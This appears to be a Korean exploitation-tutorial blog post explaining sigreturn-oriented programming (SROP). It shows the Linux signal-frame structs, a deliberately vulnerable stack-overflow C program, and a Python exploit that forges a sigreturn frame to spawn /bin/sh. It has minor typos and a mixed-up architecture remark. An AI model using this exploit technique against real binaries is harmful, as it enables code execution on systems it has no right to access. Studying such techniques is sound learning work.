y0u_bat

SROP - Sigretrun Oriented Programming 본문

System

SROP - Sigretrun Oriented Programming

유뱃 2016. 2. 11. 03:11


SROP - Sigretrun Oriented Programming 


SROP는 가젯이 충분하지 않는 상황에서 int $0x80 가젯과 eax 레지스터 컨트롤이 가능할때 쓰는 기법이다.


SROP는 - Sigreturn Oriented Progamming의 약자로 sigreturn를 이용한 기법이다.


sigretrurn system call은 signal을 받은 프로세스가 커널모드로 동작한 다음 유저모드로 돌아올때 사용하는 시스템콜이다.


sigreturn syscall number는 arm 기준 15이다.



 63 struct rt_sigframe {
 64 char __user * pretcode;
 65 struct ucontext uc;
 66 struct siginfo info;
 67 / * fp state follows here * /
 68};
  4 struct ucontext {
  5 unsigned long uc_flags;
  6 struct ucontext * uc_link;
  7 stack_t uc_stack;
  8 struct sigcontext uc_mcontext;
  9 sigset_t uc_sigmask; / * mask last for extensibility * /
 10};
127 typedef struct sigaltstack {
128 void __user * ss_sp;
129 int ss_flags;
130 size_t ss_size;
131} stack_t;
160 struct sigcontext {
161 __u64 r8;
162 __u64 r9;
163 __u64 r10;
164 __u64 r11;
165 __u64 r12;
166 __u64 r13;
167 __u64 r14;
168 __u64 r15;
169 __u64 rdi;
170 __u64 rsi;
171 __u64 rbp;
172 __u64 rbx;
173 __u64 rdx;
174 __u64 rax;
175 __u64 rcx;
176 __u64 rsp;
177 __u64 rip;
178 __u64 eflags; / * RFLAGS * /
179 __u16 cs;
180 __u16 gs;
181 __u16 fs;
182 __u16 __pad0;
183 __u64 err;
184 __u64 trapno;
185 __u64 oldmask;
186 __u64 cr2;
187 struct _fpstate __user * fpstate; / * zero when no FPU context * /
188 #ifdef __ILP32__
189 __u32 __fpstate_pad;
190 #endif
191 __u64 reserved1 [8];
192};


 rt_sigframe 순서대로 현재 rsp에서 pop한다.


uc_flags <- rsp
& uc_link
& ss_sp (stack_t)
ss_flags |
ss_size v
r8 (struct sigcontext)
r9 |
r10 |
r11 |
r12 |
r13 |
r14 |
r15 |
rdi |
rsi |
rbp |
rbx |
rdx |
rax |
rcx |
rsp |
rip |
eflags |
cs / gs / fs |
err |
trapno |
oldmask |
cr2 |
& fpstate |
reserved1 [0] |
reserved1 [1] |
reserved1 [2] |
reserved1 [3] |
reserved1 [4] |
reserved1 [5] |
reserved1 [6] |
reserved1 [7] v
uc_sigmask (sigset_t)





problem.c


#include <stdio.h>

#inlucde <stdlib.h>


int main(int argc,char *argv[])

{

int a = 0x50f;

char buf[16];

read(0,buf,1000);

}




exploit.py


from struct import *

from time import *

from subprocess import *


p = lambda x : pack("<Q",x)

syscall = 

bss = 

read = 


#sigreturn number 15


payload = ""

payload += "a"*16

payload += p(bss+0x10)

payload += p(read)


payload2 = ""

payload2 += "/bin/sh\x00"*2

payload2 += p(bss+0x10+0x10+0x8+0x8)

payload2 += p(read)

payload2 += "a"*24

payload2 += p(syscall)

payload2 += "a"*40

payload2 += p(0)*8 

payload2 += p(bss) #rdi

payload2 += p(0) #rsi

payload2 += p(0) #rbp

payload2 += p(0) #rbx

payload2 += p(0) #rdx

payload2 += p(0x3b) #rax

payload2 += p(0) #rcx

payload2 += p(0) #rsp

payload2 += p(syscall) #rip

payload2 += p(0) #eflag

payload2 += p(0x33) #csgsfs

payload2 += "A"*32

payload2 += p(0) 


ex = Popen("~/file",shell=True,stdin=PIPE)



ex.stdin.write(payload)

sleep(1)

ex.stdin.write(payload2)

sleep(1)

ex.stdin.write("a"*15)

sleep(1)


while True:

t = raw_input()

ex.stdin.write(t+'\n')





참고자료

https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CB4QFjAAahUKEwj9nOnO7-fIAhUHG6YKHWwdCG8&url=http%3A%2F%2Ferr0rless313.tistory.com%2Fattachment%2Fcfile23.uf%402379F14B54DF08BC083B9C.pdf&usg=AFQjCNHfSE2JFSMkPnsGQZVSDjfCLzZbxA&sig2=CAfKcMnH0Jn63saCrk2yMg&bvm=bv.106130839,d.dGY

http://inaz2.hatenablog.com/entry/2014/07/30/021123


저작자표시

'System' 카테고리의 다른 글

pintool 간단한 문제 풀이  (2) 2016.02.17
CVE-2015-0235 GHOST 취약점  (0) 2016.02.16
GHOST: glibc gethostbyname buffer overflow 번역 목차 (2/6)  (2) 2016.02.05
[S.S.A] 시스템해킹 스터디 6주차 (pintool)  (0) 2015.11.22
[SSA] 시스템 스터디 3주차  (0) 2015.10.20
공유하기 링크
'System' Related Articles more
Comments